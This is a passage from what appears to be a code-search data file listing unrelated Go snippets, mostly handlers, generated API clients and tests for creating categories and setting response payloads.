*CreateACLAccepted) WithPayload(payload *models.ACL) *CreateACLAccepted {\n\to.Payload = payload\n\treturn o\n}", "func CreateCategory(w http.ResponseWriter, req *http.Request) {\n\t// esta variable es el body de categoria, como todos los campos que tenga\n\tvar body domain.Category\n\n\t// comprueba que lo que le hemos pasado tiene los campos que corresponde\n\tif err := parseBody(req, &body); err != nil {\n\t\trespondWithError(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\t_, err := domain.InsertCaterogy(body)\n\tif err != nil {\n\t\tbadRequest(w, err.Error())\n\t\treturn\n\t}\n\n\trespondWithJSON(w, http.StatusOK, body)\n}", "func (w *ServerInterfaceWrapper) CreateCategory(ctx echo.Context) error {\n\tvar err error\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.CreateCategory(ctx)\n\treturn err\n}", "func (s *Server) AddCategory(ctx context.Context, in *api.Category) (*api.MsgResponse, error) {\n\tlog.Printf(\"insert category with %v\", *in)\n\tb, err := json.Marshal(in)\n\tif err != nil {\n\t\treturn &api.MsgResponse{\n\t\t\tResponseMsg: \"FAILED\",\n\t\t}, err\n\t}\n\tc := make(chan ConfirmationMessage)\n\tfn := func(uid string, err error) {\n\t\tif err != nil {\n\t\t\tresp := ConfirmationMessage{\n\t\t\t\tresponse: \"ERROR\",\n\t\t\t\terr: err,\n\t\t\t}\n\t\t\tc <- resp\n\t\t} else {\n\t\t\tresp := ConfirmationMessage{\n\t\t\t\tresponse: uid,\n\t\t\t\terr: nil,\n\t\t\t}\n\t\t\tc <- resp\n\t\t}\n\t}\n\ts.MsgPublisher.PublishEvent(kcategoryChannelID, string(b), fn)\n\n\tif ret := <-c; ret.err != nil {\n\t\treturn &api.MsgResponse{\n\t\t\tResponseMsg: \"Error\",\n\t\t}, ret.err\n\t}\n\treturn &api.MsgResponse{\n\t\tResponseMsg: \"Created\",\n\t}, err\n}", "func (o *PutSlideSuperlikeCreated) WithPayload(payload models.Success) *PutSlideSuperlikeCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionCreated) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionCreated) WithPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) *ReplaceApiextensionsV1beta1CustomResourceDefinitionCreated {\n\to.Payload = payload\n\treturn o\n}", "func NewSubCategoryTemplate()(*SubCategoryTemplate) {\n m := &SubCategoryTemplate{\n FilePlanDescriptorTemplate: *NewFilePlanDescriptorTemplate(),\n }\n return m\n}", "func (service *Service) CreateCategory(request *restful.Request, response *restful.Response) {\n\tvar req models.CategoryRequest\n\tif err := request.ReadEntity(&req); err != nil {\n\t\trespondErr(response, http.StatusBadRequest, messageBadRequest,\n\t\t\t\"unable parse request body\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusBadRequest}).\n\t\t\tError(\"Unable to parse request body:\", err)\n\n\t\treturn\n\t}\n\n\tnewUUID, err := uuid.NewRandom()\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageServerError,\n\t\t\t\"unable to create uuid\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create uuid:\", err)\n\n\t\treturn\n\t}\n\n\tcategory := models.Category{\n\t\tCategoryID: newUUID.String(),\n\t\tName: req.Name,\n\t\tImage: req.Image,\n\t}\n\n\tcreatedCategory, err := service.server.CreateCategory(category)\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageDatabaseError,\n\t\t\t\"unable to create category\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create category:\", err)\n\n\t\treturn\n\t}\n\n\tresult := &models.CreateCategoryResponse{\n\t\tResult: *createdCategory,\n\t}\n\n\twriteResponse(response, http.StatusCreated, result)\n}", "func (o *CreateHPCResourceCreated) SetPayload(payload *models.CreatedResponse) {\n\to.Payload = payload\n}", "func (client *Client) AddCategoryWithOptions(request *AddCategoryRequest, runtime *util.RuntimeOptions) (_result *AddCategoryResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.CateName)) {\n\t\tquery[\"CateName\"] = request.CateName\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ParentId)) {\n\t\tquery[\"ParentId\"] = request.ParentId\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Type)) {\n\t\tquery[\"Type\"] = request.Type\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"AddCategory\"),\n\t\tVersion: tea.String(\"2017-03-21\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &AddCategoryResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func (o *DeleteApiextensionsV1CollectionCustomResourceDefinitionOK) SetPayload(payload *models.IoK8sApimachineryPkgApisMetaV1Status) {\n\to.Payload = payload\n}", "func TestCreateCategory(t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//parameters passed to request body\n\trequestBody := &Category{\n\t\tCategoryName: \t\t\"Super Cool Category\",\n\t\tCategoryDescription: \"Brand new cool Category\",\n\t}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\t//Create a request to pass to the handler with request body as a third parameter\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 201, rr.Code, \"Created response is expected\")\n\t//the length of []Categories should increase after creating new category\n\tassert.NotEqual(t, initialLen, len(Categories), \"Expected length to increase after creating new Category\")\n}", "func (o *ClientPermissionCreateInternalServerError) SetPayload(payload *ClientPermissionCreateInternalServerErrorBody) {\n\to.Payload = payload\n}", "func (o *ClientPermissionCreateOK) SetPayload(payload *ClientPermissionCreateOKBody) {\n\to.Payload = payload\n}", "func CategoriesCreatePOST(c *gin.Context) {\n\tcategory := models.Category{}\n\tcategory.Name = c.PostForm(\"name\")\n\tcategory.Intro = c.PostForm(\"intro\")\n\tcategory.Content = c.PostForm(\"content\")\n\tcategory.Title = c.PostForm(\"title\")\n\tcategory.Description = c.PostForm(\"description\")\n\tcategory.Type = c.PostForm(\"type\")\n\tfile, _ := c.FormFile(\"image\")\n\tif file != nil {\n\t\tif _, err := os.Stat(\"public/upload/\" + category.Type); os.IsNotExist(err) {\n\t\t\tfmt.Println(\"create folder\")\n\t\t\tos.Mkdir(\"public/upload/\"+category.Type, 0755)\n\t\t}\n\t\tc.SaveUploadedFile(file, \"public/upload/\"+category.Type)\n\n\t\tcategory.Image = file.Filename\n\t}\n\tc.JSON(http.StatusBadRequest, gin.H{\"error\": category})\n}", "func (o *CreateSubCategoryCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *CreateOK) WithPayload(payload *models.Event) *CreateOK {\n\to.Payload = payload\n\treturn o\n}", "func Add(c *gin.Context){\n\tca := Category{}\n\terr := c.BindJSON(&ca)\n\tif err != nil {\n\t\tresponese.Error(c, err, nil)\n\t\treturn\n\t}\n\tn, err := ca.Write()\n\tif err != nil {\n\t\tresponese.Error(c, err, nil)\n\t\treturn\n\t}\n\tresponese.Success(c, n, nil)\n}", "func (r CreateRequest) Payload() *model.Payload {\n\tbuf, _ := json.Marshal(r)\n\treturn model.NewPostPayload(buf)\n}", "func (o *CreateACLAccepted) SetPayload(payload *models.ACL) {\n\to.Payload = payload\n}", "func (_Mcapscontroller *McapscontrollerTransactor) CreateCategory(opts *bind.TransactOpts, metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.contract.Transact(opts, \"createCategory\", metadataHash)\n}", "func (o *CreateCoreV1NamespacedServiceAccountTokenCreated) SetPayload(payload *models.IoK8sAPIAuthenticationV1TokenRequest) {\n\to.Payload = payload\n}", "func (a *Client) PostCategories(params *PostCategoriesParams) (*PostCategoriesCreated, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPostCategoriesParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"post_categories\",\n\t\tMethod: \"POST\",\n\t\tPathPattern: \"/api/rest/v1/categories\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\"},\n\t\tParams: params,\n\t\tReader: &PostCategoriesReader{formats: a.formats},\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*PostCategoriesCreated)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for post_categories: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func (o *PutSlideSuperlikeCreated) SetPayload(payload models.Success) {\n\to.Payload = payload\n}", "func (o *CreateZoneCreated) SetPayload(payload *models.CreateZoneResponse) {\n\to.Payload = payload\n}", "func (o *CreateRbacAuthorizationV1alpha1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1alpha1Role) {\n\to.Payload = payload\n}", "func (o *PatchApiextensionsV1beta1CustomResourceDefinitionStatusOK) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (o *CreateFoldersCreated) SetPayload(payload *models.CreateFolderResp) {\n\to.Payload = payload\n}", "func (o *CreateACLCreated) SetPayload(payload *models.ACL) {\n\to.Payload = payload\n}", "func (m *ClassesItemAssignmentSettingsGradingCategoriesRequestBuilder) Post(ctx context.Context, body ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable, requestConfiguration *ClassesItemAssignmentSettingsGradingCategoriesRequestBuilderPostRequestConfiguration)(ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable, error) {\n requestInfo, err := m.ToPostRequestInformation(ctx, body, requestConfiguration);\n if err != nil {\n return nil, err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n res, err := m.BaseRequestBuilder.RequestAdapter.Send(ctx, requestInfo, ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.CreateEducationGradingCategoryFromDiscriminatorValue, errorMapping)\n if err != nil {\n return nil, err\n }\n if res == nil {\n return nil, nil\n }\n return res.(ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable), nil\n}", "func (o *CreateClusterCreated) SetPayload(payload *models.Kluster) {\n\to.Payload = payload\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionOK) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (h *CategoryHandler) Create(ctx iris.Context) {\n\tvar cat entity.Category\n\tif err := ctx.ReadJSON(&cat); err != nil {\n\t\treturn\n\t}\n\n\tid, err := h.service.Insert(ctx.Request().Context(), cat)\n\tif err != nil {\n\t\tif err == sql.ErrUnprocessable {\n\t\t\tctx.StopWithJSON(iris.StatusUnprocessableEntity, newError(iris.StatusUnprocessableEntity, ctx.Request().Method, ctx.Path(), \"required fields are missing\"))\n\t\t\treturn\n\t\t}\n\n\t\tdebugf(\"CategoryHandler.Create(DB): %v\", err)\n\t\twriteInternalServerError(ctx)\n\t\treturn\n\t}\n\n\t// Send 201 with body of {\"id\":$last_inserted_id\"}.\n\tctx.StatusCode(iris.StatusCreated)\n\tctx.JSON(iris.Map{cat.PrimaryKey(): id})\n}", "func (a *AdminApiService) PostCategories(ctx _context.Context, localVarOptionals *PostCategoriesOpts) (Category, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue Category\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/categories\"\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tif localVarOptionals != nil && localVarOptionals.Category.IsSet() {\n\t\tlocalVarOptionalCategory, localVarOptionalCategoryok := localVarOptionals.Category.Value().(Category)\n\t\tif !localVarOptionalCategoryok {\n\t\t\treturn localVarReturnValue, nil, reportError(\"category should be Category\")\n\t\t}\n\t\tlocalVarPostBody = &localVarOptionalCategory\n\t}\n\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (o *CreateCoreV1NamespacedPodBindingCreated) WithPayload(payload *models.IoK8sAPICoreV1Binding) *CreateCoreV1NamespacedPodBindingCreated {\n\to.Payload = payload\n\treturn o\n}", "func (categories *Categories) CreateCategory(category Category, language string) (Category, error) {\n\texistsCategories, err := categories.ReadCategoriesByName(category.Name, language)\n\tif err != nil && err != ErrCategoriesByNameNotFound {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\tif existsCategories != nil {\n\t\treturn existsCategories[0], ErrCategoryAlreadyExist\n\t}\n\n\ttransaction := categories.storage.Client.NewTxn()\n\n\tcategory.IsActive = true\n\tencodedCategory, err := json.Marshal(category)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\tmutation := &dataBaseAPI.Mutation{\n\t\tSetJson: encodedCategory,\n\t\tCommitNow: true}\n\n\tassigned, err := transaction.Mutate(context.Background(), mutation)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\tcategory.ID = assigned.Uids[\"blank-0\"]\n\tif category.ID == \"\" {\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\terr = categories.AddLanguageOfCategoryName(category.ID, category.Name, language)\n\tif err != nil {\n\t\treturn category, err\n\t}\n\n\tcreatedCategory, err := categories.ReadCategoryByID(category.ID, language)\n\tif err != nil {\n\t\treturn category, err\n\t}\n\n\treturn createdCategory, nil\n}", "func NewCreateSubCategoryCreated() *CreateSubCategoryCreated {\n\treturn &CreateSubCategoryCreated{}\n}", "func (o *CreateRbacAuthorizationV1NamespacedRoleCreated) WithPayload(payload *models.IoK8sAPIRbacV1Role) *CreateRbacAuthorizationV1NamespacedRoleCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateRbacAuthorizationV1alpha1NamespacedRoleCreated) WithPayload(payload *models.IoK8sAPIRbacV1alpha1Role) *CreateRbacAuthorizationV1alpha1NamespacedRoleCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateRbacAuthorizationV1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1Role) {\n\to.Payload = payload\n}", "func (o *CreateClusterCreated) WithPayload(payload *models.Kluster) *CreateClusterCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *PostOrderCreated) SetPayload(payload *models.OrderCreateResponse) {\n\to.Payload = payload\n}", "func (o *CreateBackendSwitchingRuleCreated) WithPayload(payload *models.BackendSwitchingRule) *CreateBackendSwitchingRuleCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *AddConsumptionInternalServerError) WithPayload(payload *models.ErrorResponse) *AddConsumptionInternalServerError {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateBatchV1NamespacedJobCreated) WithPayload(payload *models.IoK8sAPIBatchV1Job) *CreateBatchV1NamespacedJobCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *WeaviateThingTemplatesCreateAccepted) SetPayload(payload *models.ThingTemplateGetResponse) {\n\to.Payload = payload\n}", "func TestCreateCategoryEmptyBody (t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//empty body\n\trequestBody := &Category{}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 422, rr.Code, \"Unprocessable Entity response is expected\")\n\t//the length of []Categories should not change after trying to create new empty category\n\tassert.Equal(t, initialLen, len(Categories), \"Expected length to stay the same after adding empty category name\")\n}", "func (o *CreateCurrentAPISessionCertificateOK) SetPayload(payload *rest_model.CreateCurrentAPISessionCertificateEnvelope) {\n\to.Payload = payload\n}", "func (o *AddConsumptionUnauthorized) WithPayload(payload *models.ErrorResponse) *AddConsumptionUnauthorized {\n\to.Payload = payload\n\treturn o\n}", "func (o *PostInteractionCreated) WithPayload(payload *models.ConsoleInteraction) *PostInteractionCreated {\n\to.Payload = payload\n\treturn o\n}", "func (h *Handlers) handleAddProductCategory(response http.ResponseWriter, request *http.Request) {\n\tnewProductCategory := ProductCategory{}\n\n\terr := parseBody(&newProductCategory, request)\n\tif err != nil {\n\t\tformat.Send(response, http.StatusInternalServerError, format.Message(false, \"Error occured while decoding product category\", nil))\n\t\treturn\n\t}\n\n\terr = productCategoryService.AddProductCategory(&newProductCategory)\n\tif err != nil {\n\t\tformat.Send(response, http.StatusInternalServerError, format.Message(false, \"Error occured while saving product category\", nil))\n\t\treturn\n\t}\n\tformat.Send(response, http.StatusOK, format.Message(true, \"product category saved\", nil))\n\n}", "func (o *SetResourceCreated) SetPayload(payload *models.Resource) {\n\to.Payload = payload\n}", "func (o *CreateSpoeCreated) WithPayload(payload string) *CreateSpoeCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *PatchFoldersIDOK) SetPayload(payload *models.CreateFolderResp) {\n\to.Payload = payload\n}", "func (o *ClientPermissionCreateInternalServerError) WithPayload(payload *ClientPermissionCreateInternalServerErrorBody) *ClientPermissionCreateInternalServerError {\n\to.Payload = payload\n\treturn o\n}", "func (co *SubResourceCreateOptions) ApplyToSubresourceCreate(o *SubResourceCreateOptions) {\n\tco.CreateOptions.ApplyToCreate(&co.CreateOptions)\n}", "func (service *Service) CreateCategory(req *CreateRequest) (*CreateResponse, error) {\n\tcategoryExists, err := service.repo.CheckCategoryNameExists(req.Name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif categoryExists {\n\t\treturn nil, errors.New(utils.CategoryExistsError)\n\t}\n\tcategory, err := service.repo.CreateCategory(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn category, nil\n}", "func (o *ServiceAddCreated) WithPayload(payload *models.Service) *ServiceAddCreated {\n\to.Payload = payload\n\treturn o\n}", "func (_Mcapscontroller *McapscontrollerTransactorSession) CreateCategory(metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.Contract.CreateCategory(&_Mcapscontroller.TransactOpts, metadataHash)\n}", "func (_Mcapscontroller *McapscontrollerSession) CreateCategory(metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.Contract.CreateCategory(&_Mcapscontroller.TransactOpts, metadataHash)\n}", "func (o *CreateRbacAuthorizationV1alpha1NamespacedRoleOK) WithPayload(payload *models.IoK8sAPIRbacV1alpha1Role) *CreateRbacAuthorizationV1alpha1NamespacedRoleOK {\n\to.Payload = payload\n\treturn o\n}", "func (c *ClientWithResponses) CreateSksClusterWithBodyWithResponse(ctx context.Context, contentType string, body io.Reader) (*CreateSksClusterResponse, error) {\n\trsp, err := c.CreateSksClusterWithBody(ctx, contentType, body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn ParseCreateSksClusterResponse(rsp)\n}", "func (m *ManagedTenantsManagedTenantAlertRulesRequestBuilder) Post(ctx context.Context, body i72d786f54cc0bb289c971b085dd642b2fc3af6394328682e69783fd7e229b582.ManagedTenantAlertRuleable, requestConfiguration *ManagedTenantsManagedTenantAlertRulesRequestBuilderPostRequestConfiguration)(i72d786f54cc0bb289c971b085dd642b2fc3af6394328682e69783fd7e229b582.ManagedTenantAlertRuleable, error) {\n requestInfo, err := m.ToPostRequestInformation(ctx, body, requestConfiguration);\n if err != nil {\n return nil, err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n res, err := m.BaseRequestBuilder.RequestAdapter.Send(ctx, requestInfo, i72d786f54cc0bb289c971b085dd642b2fc3af6394328682e69783fd7e229b582.CreateManagedTenantAlertRuleFromDiscriminatorValue, errorMapping)\n if err != nil {\n return nil, err\n }\n if res == nil {\n return nil, nil\n }\n return res.(i72d786f54cc0bb289c971b085dd642b2fc3af6394328682e69783fd7e229b582.ManagedTenantAlertRuleable), nil\n}", "func (o *CreateSpoeCreated) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *CreateACLCreated) WithPayload(payload *models.ACL) *CreateACLCreated {\n\to.Payload = payload\n\treturn o\n}", "func (z *Category) Create(tx Querier) error {\n\treturn nil\n}", "func (o *ServiceAddCreated) SetPayload(payload *models.Service) {\n\to.Payload = payload\n}", "func (o *CreateBatchV1NamespacedJobCreated) SetPayload(payload *models.IoK8sAPIBatchV1Job) {\n\to.Payload = payload\n}", "func NewCreateSubCategoryBadRequest() *CreateSubCategoryBadRequest {\n\treturn &CreateSubCategoryBadRequest{}\n}", "func SetCategory(c *gin.Context) {\n\tvar reqBody api.Category\n\n\terr := c.ShouldBindJSON(&reqBody)\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"Code\": http.StatusBadRequest,\n\t\t\t\"Success\": false,\n\t\t\t\"Data\": \"Incorrect request body.\",\n\t\t})\n\t\treturn\n\t}\n\n\tdb := data.ConnectDB()\n\tdb.Create(&dbTable.Category{\n\t\tTitle: reqBody.Title,\n\t})\n\n\tvar category api.Category\n\tdb.Last(&category)\n\tdb.Commit()\n\n\tc.JSON(http.StatusOK, gin.H{\n\t\t\"Code\": http.StatusOK,\n\t\t\"Success\": true,\n\t\t\"Data\": category.ID,\n\t})\n}", "func CreateTrafficInfluenceSubscription(w http.ResponseWriter,\n\tr *http.Request) {\n\n\tnefCtx := r.Context().Value(nefCtxKey(\"nefCtx\")).(*nefContext)\n\n\tvars := mux.Vars(r)\n\tlog.Infof(\" AFID : %s\", vars[\"afId\"])\n\n\tb, err := ioutil.ReadAll(r.Body)\n\tdefer closeReqBody(r)\n\n\tif err != nil {\n\t\tsendCustomeErrorRspToAF(w, 400, \"Failed to read HTTP POST Body\")\n\t\treturn\n\t}\n\n\t//Traffic Influence data\n\ttrInBody := TrafficInfluSub{}\n\n\t//Convert the json Traffic Influence data into struct\n\terr1 := json.Unmarshal(b, &trInBody)\n\n\tif err1 != nil {\n\t\tlog.Err(err1)\n\t\tsendCustomeErrorRspToAF(w, 400, \"Failed UnMarshal POST data\")\n\t\treturn\n\t}\n\n\t//validate the mandatory parameters\n\tresRsp, status := validateAFTrafficInfluenceData(trInBody)\n\tif !status {\n\t\tlog.Err(resRsp.pd.Title)\n\t\tsendErrorResponseToAF(w, resRsp)\n\t\treturn\n\t}\n\n\tloc, rsp, err3 := createNewSub(nefCtx, vars[\"afId\"], trInBody)\n\n\tif err3 != nil {\n\t\tlog.Err(err3)\n\t\t// we return bad request here since we have reached the max\n\t\trsp.errorCode = 400\n\t\tsendErrorResponseToAF(w, rsp)\n\t\treturn\n\t}\n\tlog.Infoln(loc)\n\n\ttrInBody.Self = Link(loc)\n\tEmulator_file := os.Getenv(\"Emulator_path\") + \"/on\"\n\tcmd := exec.Command(\"touch\", Emulator_file)\n\tgo cmd.Run()\n\t/*\n\tif err != nil {\n\t\tlog.Err(\"Offloading failed!\")\n\t\treturn\n\t}\n\t*/\n\n\t//Martshal data and send into the body\n\tmdata, err2 := json.Marshal(trInBody)\n\n\tif err2 != nil {\n\t\tlog.Err(err2)\n\t\tsendCustomeErrorRspToAF(w, 400, \"Failed to Marshal GET response data\")\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.Header().Set(\"Location\", loc)\n\n\t// Response should be 201 Created as per 3GPP 29.522\n\tw.WriteHeader(http.StatusCreated)\n\tlog.Infof(\"CreateTrafficInfluenceSubscription responses => %d\",\n\t\thttp.StatusCreated)\n\t_, err = w.Write(mdata)\n\tif err != nil {\n\t\tlog.Errf(\"Write Failed: %v\", err)\n\t\treturn\n\t}\n\tnef := &nefCtx.nef\n\tlogNef(nef)\n\n}", "func (o *V1CreateHelloOK) SetPayload(payload *models.CreateHelloResponse) {\n\to.Payload = payload\n}", "func (o *PutProjectProjectNameStageStageNameServiceServiceNameResourceCreated) SetPayload(payload *models.Version) {\n\to.Payload = payload\n}", "func BuildCreatePayload(productCreateBody string, productCreateToken string) (*product.CreatePayload, error) {\n\tvar err error\n\tvar body CreateRequestBody\n\t{\n\t\terr = json.Unmarshal([]byte(productCreateBody), &body)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"invalid JSON for body, \\nerror: %s, \\nexample of valid JSON:\\n%s\", err, \"'{\\n \\\"code\\\": \\\"123asd123123asd\\\",\\n \\\"cost_price\\\": 123,\\n \\\"founder_id\\\": \\\"519151ca-6250-4eec-8016-1e14a68dc448\\\",\\n \\\"image\\\": \\\"/images/123.jpg\\\",\\n \\\"is_shelves\\\": false,\\n \\\"market_price\\\": 123,\\n \\\"name\\\": \\\"灌装辣椒\\\",\\n \\\"note\\\": \\\"备注\\\",\\n \\\"size\\\": \\\"瓶\\\",\\n \\\"type\\\": 1,\\n \\\"unit\\\": 1\\n }'\")\n\t\t}\n\t\tif !(body.Unit == 1 || body.Unit == 2 || body.Unit == 3 || body.Unit == 4 || body.Unit == 5 || 